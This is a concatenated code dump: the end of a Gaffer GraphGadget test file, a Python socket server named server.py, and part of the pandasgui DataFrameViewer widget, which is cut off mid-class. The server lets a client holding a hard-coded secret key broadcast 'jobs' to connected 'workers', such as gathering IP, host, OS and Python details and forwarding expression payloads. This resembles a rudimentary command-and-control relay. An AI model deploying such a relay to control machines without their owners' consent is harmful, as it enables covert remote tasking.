	self.assertIsNotNone( g.connectionGadget( script["n2"]["in"] ) )
	self.assertIsNone( g.connectionGadget( script["n2"]["in"] ).srcNodule() )

	Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
	self.assertIsNotNone( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) )
	self.assertIsNotNone( g.connectionGadget( script["n2"]["in"] ) )
	self.assertIsNotNone( g.connectionGadget( script["n2"]["in"] ).srcNodule() )
def testRemoveNonNodulePlug( self ) :

	"""Deleting a plug that was never given a nodule must not crash."""

	script = Gaffer.ScriptNode()
	script["n"] = Gaffer.Node()
	script["n"]["p"] = Gaffer.Plug()
	Gaffer.Metadata.registerValue( script["n"]["p"], "nodule:type", "" )

	g = GafferUI.GraphGadget( script )
	self.assertIsNone( g.nodeGadget( script["n"] ).nodule( script["n"]["p"] ) )

	# Once upon a time, this would crash.
	del script["n"]["p"]
def testEnabledException( self ) :

	"""A NodeGadget must still be created for a node whose `enabled` plug
	errors when evaluated."""

	script = Gaffer.ScriptNode()
	script["n"] = GafferTest.AddNode()
	script["e"] = Gaffer.Expression()
	# This expression errors deliberately - the variable is undefined.
	script["e"].setExpression( "parent['n']['enabled'] = undefinedVariable" )

	g = GafferUI.GraphGadget( script )
	self.assertIsNotNone( g.nodeGadget( script["n"] ) )
def testLayoutAccessors( self ) :

	"""getLayout()/setLayout() must round-trip layout instances, with a
	StandardGraphLayout provided by default."""

	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )

	originalLayout = g.getLayout()
	self.assertIsInstance( originalLayout, GafferUI.StandardGraphLayout )

	replacementLayout = GafferUI.StandardGraphLayout()
	g.setLayout( replacementLayout )
	self.assertTrue( g.getLayout().isSame( replacementLayout ) )

	g.setLayout( originalLayout )
	self.assertTrue( g.getLayout().isSame( originalLayout ) )
def testUnpositionedNodeGadgets( self ) :

	"""unpositionedNodeGadgets() must list a node's gadget until the node
	is given an explicit position."""

	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )

	script["n"] = Gaffer.Node()
	self.assertEqual( g.unpositionedNodeGadgets(), [ g.nodeGadget( script["n"] ) ] )

	g.setNodePosition( script["n"], imath.V2f( 0 ) )
	self.assertEqual( g.unpositionedNodeGadgets(), [] )
def testInputConnectionMaintainedOnNoduleMove( self ) :

	"""Moving the destination nodule between layout sections must keep the
	connection gadget attached at both ends."""

	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )

	script["n1"] = GafferTest.AddNode()
	script["n2"] = GafferTest.AddNode()
	script["n2"]["op1"].setInput( script["n1"]["sum"] )
	self.assertIsNotNone( g.connectionGadget( script["n2"]["op1"] ) )

	for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :

		Gaffer.Metadata.registerValue( script["n2"]["op1"], "noduleLayout:section", section )

		connection = g.connectionGadget( script["n2"]["op1"] )
		self.assertIsNotNone( connection )
		self.assertIsNotNone( connection.srcNodule() )
		self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( script["n1"] ).nodule( script["n1"]["sum"] ) ) )
		self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( script["n2"] ).nodule( script["n2"]["op1"] ) ) )
def testOutputConnectionMaintainedOnNoduleMove( self ) :

	"""Moving the source nodule between layout sections must keep the
	connection gadget attached at both ends."""

	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )

	script["n1"] = GafferTest.AddNode()
	script["n2"] = GafferTest.AddNode()
	script["n2"]["op1"].setInput( script["n1"]["sum"] )
	self.assertIsNotNone( g.connectionGadget( script["n2"]["op1"] ) )

	for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :

		Gaffer.Metadata.registerValue( script["n1"]["sum"], "noduleLayout:section", section )

		connection = g.connectionGadget( script["n2"]["op1"] )
		self.assertIsNotNone( connection )
		self.assertIsNotNone( connection.srcNodule() )
		self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( script["n1"] ).nodule( script["n1"]["sum"] ) ) )
		self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( script["n2"] ).nodule( script["n2"]["op1"] ) ) )
def testInputConnectionMaintainedOnNestedNoduleMove( self ) :

	"""Moving a CompoundNodule's parent between layout sections must keep
	connections to its child nodules attached at both ends."""

	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )

	script["n1"] = GafferTest.AddNode()
	script["n2"] = GafferTest.ArrayPlugNode()

	Gaffer.Metadata.registerValue( script["n2"]["in"], "nodule:type", "GafferUI::CompoundNodule" )
	script["n2"]["in"][0].setInput( script["n1"]["sum"] )
	self.assertIsNotNone( g.connectionGadget( script["n2"]["in"][0] ) )

	for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :

		Gaffer.Metadata.registerValue( script["n2"]["in"], "noduleLayout:section", section )

		connection = g.connectionGadget( script["n2"]["in"][0] )
		self.assertIsNotNone( connection )
		self.assertIsNotNone( connection.srcNodule() )
		self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( script["n1"] ).nodule( script["n1"]["sum"] ) ) )
		self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( script["n2"] ).nodule( script["n2"]["in"][0] ) ) )
def testNodeGadgetMetadataChanges( self ) :

	# Registering an empty "nodeGadget:type" metadata value must hide a
	# node's gadget (detaching its end of any connection gadget), and
	# restoring the standard type must bring everything back. The three
	# nested helpers capture the expected state at each step and are
	# re-invoked as the metadata is toggled.

	s = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( s )

	s["n1"] = GafferTest.AddNode()
	s["n2"] = GafferTest.AddNode()
	s["n2"]["op1"].setInput( s["n1"]["sum"] )

	def assertBothVisible() :

		# Both nodes drawn, connection attached at both ends.
		ng1 = g.nodeGadget( s["n1"] )
		ng2 = g.nodeGadget( s["n2"] )
		c = g.connectionGadget( s["n2"]["op1"] )

		self.assertTrue( isinstance( ng1, GafferUI.StandardNodeGadget ) )
		self.assertTrue( isinstance( ng2, GafferUI.StandardNodeGadget ) )
		self.assertTrue( isinstance( c, GafferUI.StandardConnectionGadget ) )
		self.assertTrue( c.srcNodule().isSame( ng1.nodule( s["n1"]["sum"] ) ) )
		self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )

	assertBothVisible()

	Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "" )

	def assertN1Hidden() :

		# Source node hidden - the connection survives with a null srcNodule.
		ng1 = g.nodeGadget( s["n1"] )
		ng2 = g.nodeGadget( s["n2"] )
		c = g.connectionGadget( s["n2"]["op1"] )

		self.assertTrue( ng1 is None )
		self.assertTrue( isinstance( ng2, GafferUI.StandardNodeGadget ) )
		self.assertTrue( isinstance( c, GafferUI.StandardConnectionGadget ) )
		self.assertTrue( c.srcNodule() is None )
		self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )

	assertN1Hidden()

	Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "" )

	def assertBothHidden() :

		# Both nodes hidden - the connection gadget disappears entirely.
		self.assertTrue( g.nodeGadget( s["n1"] ) is None )
		self.assertTrue( g.nodeGadget( s["n2"] ) is None )
		self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is None )

	assertBothHidden()

	# Restore the standard gadget type one node at a time; the earlier
	# helper states must be reproduced exactly.
	Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
	assertN1Hidden()

	Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
	assertBothVisible()
# Allow the test file to be executed directly as a script.
if __name__ == "__main__":
	unittest.main()
|
server.py | import socket, threading
# Hostname of the machine running this server; used to report our IP at startup.
hostname = socket.gethostname()
# STUFF
# Addresses of every client that has connected (appended in handle_user_connection).
workers = []
# Sentinel prefix marking a message as a job/task payload.
Job_key = "THIS IS A JOB TASK"
# Shared secret: messages containing this are treated as boss commands.
# NOTE(review): hard-coded secret in source - should come from config/env.
server_private_key = "8d6fsdfh39ur893uruf86we7f58734y uihuhUYGIUDHS*&AD9d8 3yuh78y(*iu(d*&D"
# Sentinel prefix marking an expression payload.
expression_key = "This is an expresiion"
# Sentinel prefix marking a query payload (e.g. a CHROME search).
Query_Key = "This is a Query"
# Global list that maintains the currently open client connections.
connections = []
def _handle_boss_command(command: str, connection: socket.socket) -> None:
    '''
    Dispatch a single boss command (already stripped of the private key).

    Known commands broadcast a job to all other connections; unknown text
    is silently ignored, as before.
    '''
    if command == "IP":
        broadcast(Job_key + "Get IP", connection)
    if command == "PYV":
        broadcast(Job_key + "Get python version", connection)
    if command == "HOST":
        broadcast(Job_key + "hostthing", connection)
    if command.startswith("CHROME "):
        # Slice the prefix off. The original used str.strip("CHROME "),
        # which removes *characters* (C,H,R,O,M,E,space) from both ends
        # and would mangle queries such as "ECHO chamber".
        query = command[len("CHROME "):]
        broadcast(Job_key + Query_Key + query, connection)
    if command == "CHROME":
        broadcast(Job_key + "thing", connection)
    if command == "OS":
        broadcast(Job_key + "bruh", connection)
    if command.startswith("whisp "):
        rest = command[len("whisp "):]
        # Split once: first token is the target worker, the remainder is
        # the message. The original split() then args[1] dropped every
        # word after the second, and raised IndexError on a bare target.
        args = rest.split(" ", 1)
        if len(args) == 2:
            print(args[0] + " " + args[1])
            whisper(args[0], Job_key + args[1], connection)
    if expression_key in command:
        # Take everything after the expression marker, wherever it sits.
        exp = command[command.index(expression_key) + len(expression_key):]
        broadcast(expression_key + str(exp), connection)


def handle_user_connection(connection: socket.socket, address: tuple) -> None:
    '''
    Receive messages from one connected client until it disconnects.

    Boss messages (carrying server_private_key) are dispatched as commands,
    job replies (carrying Job_key) are logged, and anything else is
    broadcast to the other connections.
    '''
    workers.append(address)
    while True:
        try:
            msg = connection.recv(1024)

            # An empty read means the peer closed the connection.
            if not msg:
                remove_connection(connection)
                break

            m = msg.decode()
            if server_private_key in m:
                # Boss command: strip the key prefix and dispatch.
                payload = m[len(server_private_key):]
                print(f'BOS {address[0]}:{address[1]} - {payload}')
                _handle_boss_command(payload, connection)
            elif Job_key in m:
                # Job reply from a worker - log it once (the original
                # printed it twice, and strip(Job_key) garbled it).
                payload = m[len(Job_key):] if m.startswith(Job_key) else m
                print(f'JOB {address[0]}:{address[1]} - {payload}')
            else:
                # Ordinary chat message: relay to everyone else.
                print(f'MSG {address[0]}:{address[1]} - {m}')
                broadcast(f'From {address[0]}:{address[1]} - {m}', connection)

        except Exception as e:
            print(f'Error to handle user connection: {e}')
            remove_connection(connection)
            break
def broadcast(message: str, connection: socket.socket) -> None:
    '''
    Send *message* to every connected client except the sender.

    Dead sockets are dropped from the global connections list.
    '''
    # Iterate over a snapshot: remove_connection() mutates `connections`,
    # and mutating a list while iterating it skips elements.
    for client_conn in list(connections):
        # Don't echo the message back to its sender.
        if client_conn != connection:
            try:
                client_conn.send(message.encode())
            # If sending fails, the socket has probably died - drop it.
            except Exception as e:
                # The f-prefix was missing originally, so the literal
                # text "{e}" was printed instead of the error.
                print(f'Error broadcasting message: {e}')
                remove_connection(client_conn)
def whisper(worker, message: str, connection: socket.socket) -> None:
    '''
    Send *message* to the first connection whose repr mentions *worker*.

    If no connection matches, the whisper is reported and dropped; the
    original left `target` unbound and raised NameError in that case.
    '''
    for client_conn in connections:
        if worker in str(client_conn):
            try:
                client_conn.send(message.encode())
            except Exception as e:
                # Same best-effort policy as broadcast(): drop dead sockets.
                print(f'Error whispering message: {e}')
                remove_connection(client_conn)
            return
    print(f'whisper: no connection matching {worker!r}')
def remove_connection(conn: socket.socket) -> None:
    '''
    Close *conn* and drop it from the global connections list.

    Does nothing if the connection is not currently tracked.
    '''
    # Guard clause: unknown connections are ignored.
    if conn not in connections:
        return
    conn.close()
    connections.remove(conn)
def server() -> None:
    '''
    Accept client connections forever, spawning one handler thread per
    client, and clean up all sockets on the way out.
    '''
    LISTENING_PORT = 12000

    # Pre-bind so the `finally` block is safe even if socket creation
    # itself fails (originally `socket_instance` could be unbound there).
    socket_instance = None
    try:
        socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket_instance.bind(('', LISTENING_PORT))
        # Backlog of 4 pending (not concurrent) connections.
        socket_instance.listen(4)

        print('Server running!')
        print("Your server is running on IP: " + socket.gethostbyname(hostname) + " on PORT: " + str(LISTENING_PORT))

        while True:
            # Accept a client, track it, and hand it to a worker thread
            # that relays its messages to the other connections.
            socket_connection, address = socket_instance.accept()
            connections.append(socket_connection)
            threading.Thread(target=handle_user_connection, args=[socket_connection, address]).start()

    except Exception as e:
        print(f'An error has occurred when instancing socket: {e}')
    finally:
        # Iterate over a copy: remove_connection() mutates `connections`,
        # and mutating a list while iterating it skips every other element.
        for conn in list(connections):
            remove_connection(conn)
        if socket_instance is not None:
            socket_instance.close()
# Start the server only when executed as a script, not when imported.
if __name__ == "__main__":
    server()
|
dataframe_viewer.py | import sys
import threading
import os
from typing import Union
import numpy as np
import pandas as pd
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import Qt
from typing_extensions import Literal
from pandasgui.store import PandasGuiDataFrameStore
import pandasgui
import logging
from pandasgui.widgets.column_menu import ColumnMenu
logger = logging.getLogger(__name__)
class DataFrameViewer(QtWidgets.QWidget):
    """
    Composite widget rendering a DataFrame as five synchronized views:
    the cell data table, a horizontal column header, a vertical index header,
    and two thin strips showing the column/index level names.
    """
    def __init__(self, pgdf: PandasGuiDataFrameStore):
        super().__init__()
        pgdf = PandasGuiDataFrameStore.cast(pgdf)
        # Register this viewer on the store so other components can reach it
        pgdf.dataframe_viewer = self
        self.pgdf = pgdf
        # Local state
        # How to color cells
        self.color_mode: Literal[None, 'column', 'row', 'all'] = None
        # Set up DataFrame TableView and Model
        self.dataView = DataTableView(parent=self)
        # Create headers
        self.columnHeader = HeaderView(parent=self, orientation=Qt.Horizontal)
        self.indexHeader = HeaderView(parent=self, orientation=Qt.Vertical)
        self.columnHeaderNames = HeaderNamesView(parent=self, orientation=Qt.Horizontal)
        self.indexHeaderNames = HeaderNamesView(parent=self, orientation=Qt.Vertical)
        # Set up layout
        self.gridLayout = QtWidgets.QGridLayout()
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setSpacing(0)
        self.setLayout(self.gridLayout)
        # Linking scrollbars
        # Scrolling in data table also scrolls the headers
        self.dataView.horizontalScrollBar().valueChanged.connect(self.columnHeader.horizontalScrollBar().setValue)
        self.dataView.verticalScrollBar().valueChanged.connect(self.indexHeader.verticalScrollBar().setValue)
        # Scrolling in headers also scrolls the data table
        self.columnHeader.horizontalScrollBar().valueChanged.connect(self.dataView.horizontalScrollBar().setValue)
        self.indexHeader.verticalScrollBar().valueChanged.connect(self.dataView.verticalScrollBar().setValue)
        # Turn off default scrollbars
        self.dataView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        self.dataView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        # Disable scrolling on the headers. Even though the scrollbars are hidden, scrolling by dragging desyncs them
        self.indexHeader.horizontalScrollBar().valueChanged.connect(lambda: None)
        # Plain widget filling the top-left grid corner; WA_StyledBackground lets stylesheets paint it
        class CornerWidget(QtWidgets.QWidget):
            def __init__(self):
                super().__init__()
                # https://stackoverflow.com/questions/32313469/stylesheet-in-pyside-not-working
                self.setAttribute(QtCore.Qt.WA_StyledBackground)
        self.corner_widget = CornerWidget()
        self.corner_widget.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding,
                                                               QtWidgets.QSizePolicy.Expanding))
        # Add items to grid layout
        self.gridLayout.addWidget(self.corner_widget, 0, 0)
        self.gridLayout.addWidget(self.columnHeader, 0, 1, 2, 2)
        self.gridLayout.addWidget(self.columnHeaderNames, 0, 3, 2, 1)
        self.gridLayout.addWidget(self.indexHeader, 2, 0, 2, 2)
        self.gridLayout.addWidget(self.indexHeaderNames, 1, 0, 1, 1, Qt.AlignBottom)
        self.gridLayout.addWidget(self.dataView, 3, 2, 1, 1)
        self.gridLayout.addWidget(self.dataView.horizontalScrollBar(), 4, 2, 1, 1)
        self.gridLayout.addWidget(self.dataView.verticalScrollBar(), 3, 3, 1, 1)
        # Fix scrollbars forcing a minimum height of the dataView which breaks layout for small number of rows
        self.dataView.verticalScrollBar().setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,
                                                                              QtWidgets.QSizePolicy.Ignored))
        self.dataView.horizontalScrollBar().setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored,
                                                                                QtWidgets.QSizePolicy.Fixed))
        # These expand when the window is enlarged instead of having the grid squares spread out
        self.gridLayout.setColumnStretch(4, 1)
        self.gridLayout.setRowStretch(5, 1)
        #
        # self.gridLayout.addItem(QtWidgets.QSpacerItem(0, 0,
        #                                               QtWidgets.QSizePolicy.Expanding,
        #                                               QtWidgets.QSizePolicy.Expanding), 0, 0, 1, 1, )
        self.set_styles()
        self.indexHeader.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum)
        self.columnHeader.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.MinimumExpanding)
        # Default row height
        default_row_height = 28
        self.indexHeader.verticalHeader().setDefaultSectionSize(default_row_height)
        self.dataView.verticalHeader().setDefaultSectionSize(default_row_height)
        # Set column widths
        for column_index in range(self.columnHeader.model().columnCount()):
            self.auto_size_column(column_index)
    def set_styles(self):
        """Zero out margins on all five child views so they tile seamlessly."""
        for item in [self.dataView, self.columnHeader, self.indexHeader, self.indexHeaderNames, self.columnHeaderNames]:
            item.setContentsMargins(0, 0, 0, 0)
            # item.setItemDelegate(NoFocusDelegate())
    def __reduce__(self):
        # This is so dataclasses.asdict doesn't complain about this being unpicklable
        return "DataFrameViewer"
    def auto_size_column(self, column_index):
        """
        Set the size of column at column_index to fit its contents
        """
        width = 0
        # Iterate over the data view rows and check the width of each to determine the max width for the column
        # Only check the first N rows for performance. If there is larger content in cells below it will be cut off
        N = 100
        # range objects support slicing, so [:N] caps the iteration at N rows
        for i in range(self.dataView.model().rowCount())[:N]:
            mi = self.dataView.model().index(i, column_index)
            text = self.dataView.model().data(mi)
            w = self.dataView.fontMetrics().boundingRect(text).width()
            width = max(width, w)
        # Repeat for header cells
        for i in range(self.columnHeader.model().rowCount()):
            mi = self.columnHeader.model().index(i, column_index)
            text = self.columnHeader.model().data(mi)
            w = self.columnHeader.fontMetrics().boundingRect(text).width()
            width = max(width, w)
        padding = 30
        width += padding
        # add maximum allowable column width so column is never too big.
        max_allowable_width = 500
        width = min(width, max_allowable_width)
        self.columnHeader.setColumnWidth(column_index, width)
        self.dataView.setColumnWidth(column_index, width)
        self.dataView.updateGeometry()
        self.columnHeader.updateGeometry()
    def auto_size_row(self, row_index):
        """
        Set the size of row at row_index to fit its contents
        """
        padding = 20
        self.indexHeader.resizeRowToContents(row_index)
        height = self.indexHeader.rowHeight(row_index)
        # Iterate over the row's columns and check the width of each to determine the max height for the row
        # Only check the first N columns for performance.
        N = 100
        for i in range(min(N, self.dataView.model().columnCount())):
            mi = self.dataView.model().index(row_index, i)
            cell_width = self.columnHeader.columnWidth(i)
            text = self.dataView.model().data(mi)
            # Gets row height at a constrained width (the column width).
            # This constrained width, with the flag of Qt.TextWordWrap
            # gets the height the cell would have to be to fit the text.
            constrained_rect = QtCore.QRect(0, 0, cell_width, 0)
            h = self.dataView.fontMetrics().boundingRect(constrained_rect, Qt.TextWordWrap, text).height()
            height = max(height, h)
        height += padding
        self.indexHeader.setRowHeight(row_index, height)
        self.dataView.setRowHeight(row_index, height)
        self.dataView.updateGeometry()
        self.indexHeader.updateGeometry()
    def keyPressEvent(self, event):
        """Handle clipboard hotkeys (Ctrl+C / Ctrl+Shift+C / Paste) locally."""
        # Disabling this and moving hotkeys to main GUI
        if self.pgdf.gui is not None:
            super(DataFrameViewer, self).keyPressEvent(event)
        # NOTE(review): when a main GUI is attached, the event is handed to the
        # QWidget handler above and then again below; presumably an early
        # ``return`` after the ``super()`` call was intended — confirm.
        QtWidgets.QWidget.keyPressEvent(self, event)
        mods = event.modifiers()
        # Ctrl+C
        if event.key() == Qt.Key_C and (mods & Qt.ControlModifier):
            self.copy()
        # Ctrl+Shift+C
        if event.key() == Qt.Key_C and (mods & Qt.ShiftModifier) and (mods & Qt.ControlModifier):
            self.copy(header=True)
        if event.matches(QtGui.QKeySequence.Paste):
            self.paste()
        # Ctrl+P / Ctrl+D are reserved but currently unbound
        if event.key() == Qt.Key_P and (mods & Qt.ControlModifier):
            pass
        if event.key() == Qt.Key_D and (mods & Qt.ControlModifier):
            pass
    def copy(self, header=False):
        """
        Copy the selected cells to clipboard in an Excel-pasteable format

        When ``header`` is True, index/column labels are included and the data
        view is used regardless of which child widget has focus.
        """
        # Get the bounds using the top left and bottom right selected cells
        # Copy from data, columns, or index depending which has focus
        if header or self.dataView.hasFocus():
            indexes = self.dataView.selectionModel().selection().indexes()
            rows = [ix.row() for ix in indexes]
            cols = [ix.column() for ix in indexes]
            temp_df = self.pgdf.df
            df = temp_df.iloc[min(rows): max(rows) + 1, min(cols): max(cols) + 1]
        elif self.indexHeader.hasFocus():
            indexes = self.indexHeader.selectionModel().selection().indexes()
            rows = [ix.row() for ix in indexes]
            cols = [ix.column() for ix in indexes]
            temp_df = self.pgdf.df.index.to_frame()
            df = temp_df.iloc[min(rows): max(rows) + 1, min(cols): max(cols) + 1]
        elif self.columnHeader.hasFocus():
            indexes = self.columnHeader.selectionModel().selection().indexes()
            rows = [ix.row() for ix in indexes]
            cols = [ix.column() for ix in indexes]
            # Column header should be horizontal so we transpose
            temp_df = self.pgdf.df.columns.to_frame().transpose()
            df = temp_df.iloc[min(rows): max(rows) + 1, min(cols): max(cols) + 1]
        else:
            return
        # If I try to use df.to_clipboard without starting new thread, large selections give access denied error
        if df.shape == (1, 1):
            # Special case for single-cell copy, excel=False removes the trailing \n character.
            threading.Thread(target=lambda df: df.to_clipboard(index=header, header=header,
                                                               excel=False), args=(df,)).start()
        else:
            threading.Thread(target=lambda df: df.to_clipboard(index=header, header=header), args=(df,)).start()
    def paste(self):
        """Paste clipboard contents into the DataFrame starting at the top-left
        selected cell, then select the pasted range."""
        df_to_paste = pd.read_clipboard(sep=',|\t',
                                        na_values='""',  # https://stackoverflow.com/a/67915100/3620725
                                        header=None, skip_blank_lines=False)
        # Get the bounds using the top left and bottom right selected cells
        indexes = self.dataView.selectionModel().selection().indexes()
        rows = [ix.row() for ix in indexes]
        cols = [ix.column() for ix in indexes]
        self.pgdf.paste_data(min(rows), min(cols), df_to_paste)
        # Select the range of cells that were pasted
        self.dataView.selectionModel().clearSelection()
        temp = self.dataView.selectionMode()
        self.dataView.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
        for i in range(df_to_paste.shape[0]):
            for j in range(df_to_paste.shape[1]):
                self.dataView.selectionModel().select(self.dataView.model().index(min(rows) + i, min(cols) + j),
                                                      QtCore.QItemSelectionModel.Select)
        self.dataView.setSelectionMode(temp)
    def show_column_menu(self, column_ix_or_name: Union[str, int]):
        """Open the per-column context menu below the given column (index or name)."""
        if isinstance(self.pgdf.df.columns, pd.MultiIndex):
            logger.info("Column menu not implemented for MultiIndex")
            return
        if type(column_ix_or_name) == str:
            column_ix = list(self.pgdf.df.columns).index(column_ix_or_name)
        else:
            column_ix = column_ix_or_name
        point = QtCore.QPoint(self.columnHeader.columnViewportPosition(column_ix),
                              self.columnHeader.geometry().bottom())
        menu = ColumnMenu(self.pgdf, column_ix, self)
        menu.show_menu(self.columnHeader.mapToGlobal(point))
    def _remove_column(self, ix):
        """Notify the data and column-header models that column ``ix`` was removed.
        Assumes the underlying DataFrame was already updated elsewhere."""
        for model in [self.dataView.model(), self.columnHeader.model()]:
            parent = QtCore.QModelIndex()
            model.beginRemoveColumns(parent, ix, ix)
            model.endRemoveColumns()
    def _move_column(self, ix, new_ix):
        """Move the visual column width from position ``ix`` to ``new_ix`` and refresh."""
        for view in [self.dataView, self.columnHeader]:
            model = view.model()
            column_widths = [view.columnWidth(ix) for ix in range(model.columnCount())]
            column_widths.insert(new_ix, column_widths.pop(ix))
            # Set width of destination column to the width of the source column
            for j in range(len(column_widths)):
                view.setColumnWidth(j, column_widths[j])
        self.refresh_ui()
    def refresh_ui(self):
        """Reset all five models and recompute spans/geometry after the DataFrame changed."""
        # Update models
        self.models = []
        self.models += [self.dataView.model(),
                        self.columnHeader.model(),
                        self.indexHeader.model(),
                        self.columnHeaderNames.model(),
                        self.indexHeaderNames.model(),
                        ]
        for model in self.models:
            model.beginResetModel()
            model.endResetModel()
        # Update multi-index spans
        for view in [self.columnHeader,
                     self.indexHeader]:
            view.set_spans()
        # Update sizing
        for view in [self.columnHeader,
                     self.indexHeader,
                     self.dataView]:
            view.updateGeometry()
# Remove dotted border on cell focus. https://stackoverflow.com/a/55252650/3620725
class NoFocusDelegate(QtWidgets.QStyledItemDelegate):
    """Item delegate that clears the focus flag so cells never draw the
    dotted focus rectangle."""

    def paint(self, painter: QtGui.QPainter, item: QtWidgets.QStyleOptionViewItem, ix: QtCore.QModelIndex):
        # Strip State_HasFocus before delegating to the default painter
        if item.state & QtWidgets.QStyle.State_HasFocus:
            item.state ^= QtWidgets.QStyle.State_HasFocus
        super().paint(painter, item, ix)
class DataTableModel(QtCore.QAbstractTableModel):
    """
    Model for DataTableView to connect for DataFrame data.

    Serves display/edit/tooltip text per cell and, when the viewer's
    ``color_mode`` is set, a red heat-map background proportional to the
    cell's share of the relevant max statistic.
    """
    def __init__(self, parent: DataFrameViewer):
        super().__init__(parent)
        self.dataframe_viewer: DataFrameViewer = parent
        self.pgdf: PandasGuiDataFrameStore = parent.pgdf

    def headerData(self, section, orientation, role=None):
        # Headers for DataTableView are hidden. Header data is shown in HeaderView
        pass

    def columnCount(self, parent=None):
        return self.pgdf.df.columns.shape[0]

    def rowCount(self, parent=None):
        return len(self.pgdf.df)

    # Returns the data from the DataFrame
    def data(self, index, role=QtCore.Qt.DisplayRole):
        """Return cell text for Display/Edit/ToolTip roles or a QColor for BackgroundRole."""
        row = index.row()
        col = index.column()
        cell = self.pgdf.df.iloc[row, col]
        if role in (QtCore.Qt.DisplayRole, QtCore.Qt.EditRole, QtCore.Qt.ToolTipRole):
            # Need to check type since a cell might contain a list or Series, then .isna returns a Series not a bool
            cell_is_na = pd.isna(cell)
            if isinstance(cell_is_na, bool) and cell_is_na:
                if role == QtCore.Qt.DisplayRole:
                    return "●"
                elif role == QtCore.Qt.EditRole:
                    return ""
                elif role == QtCore.Qt.ToolTipRole:
                    return "NaN"
            # Float formatting (tooltips show the full repr instead)
            if isinstance(cell, (float, np.floating)):
                if not role == QtCore.Qt.ToolTipRole:
                    return "{:.4f}".format(cell)
            return str(cell)
        elif role == QtCore.Qt.BackgroundRole:
            color_mode = self.dataframe_viewer.color_mode
            # pd.isna may return an array for list-like cells, which cannot be
            # used in a boolean context — guard with an isinstance check
            cell_is_na = pd.isna(cell)
            if color_mode is None or (isinstance(cell_is_na, bool) and cell_is_na):
                return None
            try:
                float(cell)
            except (TypeError, ValueError):
                # Cell isn't numeric — no background color
                return None
            if color_mode == 'all':
                percentile = cell / self.pgdf.column_statistics['Max'].max()
            elif color_mode == 'row':
                percentile = cell / self.pgdf.row_statistics['Max'][row]
            elif color_mode == 'column':
                percentile = cell / self.pgdf.column_statistics['Max'][col]
            else:
                raise ValueError
            if pd.isna(percentile):
                return None
            else:
                # Red with alpha proportional to the cell's share of the max
                return QtGui.QColor(255, 0, 0, int(255 * percentile))

    def flags(self, index):
        """Cells are editable only when the store's settings allow it."""
        if self.dataframe_viewer.pgdf.settings.editable:
            return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
        else:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable

    def setData(self, index, value, role=None):
        """Forward an edit to the store; return True on success, False otherwise."""
        if role == QtCore.Qt.EditRole:
            row = index.row()
            col = index.column()
            try:
                self.pgdf.edit_data(row, col, value)
            except Exception as e:
                logger.exception(e)
                return False
            return True
        return False
class DataTableView(QtWidgets.QTableView):
    """Table view that shows the raw DataFrame cells; the index/column headers
    are rendered by separate HeaderView widgets."""

    def __init__(self, parent: DataFrameViewer):
        super().__init__(parent)
        self.dataframe_viewer: DataFrameViewer = parent
        self.pgdf: PandasGuiDataFrameStore = parent.pgdf
        # Attach the data model before touching the selection model
        self.setModel(DataTableModel(parent))
        # Built-in headers are hidden — HeaderView widgets take their place
        self.horizontalHeader().hide()
        self.verticalHeader().hide()
        # Mirror cell selections into the header views
        self.selectionModel().selectionChanged.connect(self.on_selectionChanged)
        # Smooth per-pixel scrolling in both directions
        self.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
        self.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)

    def on_selectionChanged(self):
        """Highlight the header cells matching the selected data rows/columns.

        Skipped for whichever header currently has focus: clicking a header
        auto-selects whole rows/columns in the data table, which fires this
        slot again and would otherwise recurse forever.
        """
        col_header = self.dataframe_viewer.columnHeader
        row_header = self.dataframe_viewer.indexHeader
        if not col_header.hasFocus():
            current = self.selectionModel().selection()
            col_header.selectionModel().select(
                current,
                QtCore.QItemSelectionModel.Columns
                | QtCore.QItemSelectionModel.ClearAndSelect,
            )
        if not row_header.hasFocus():
            current = self.selectionModel().selection()
            row_header.selectionModel().select(
                current,
                QtCore.QItemSelectionModel.Rows
                | QtCore.QItemSelectionModel.ClearAndSelect,
            )

    def sizeHint(self):
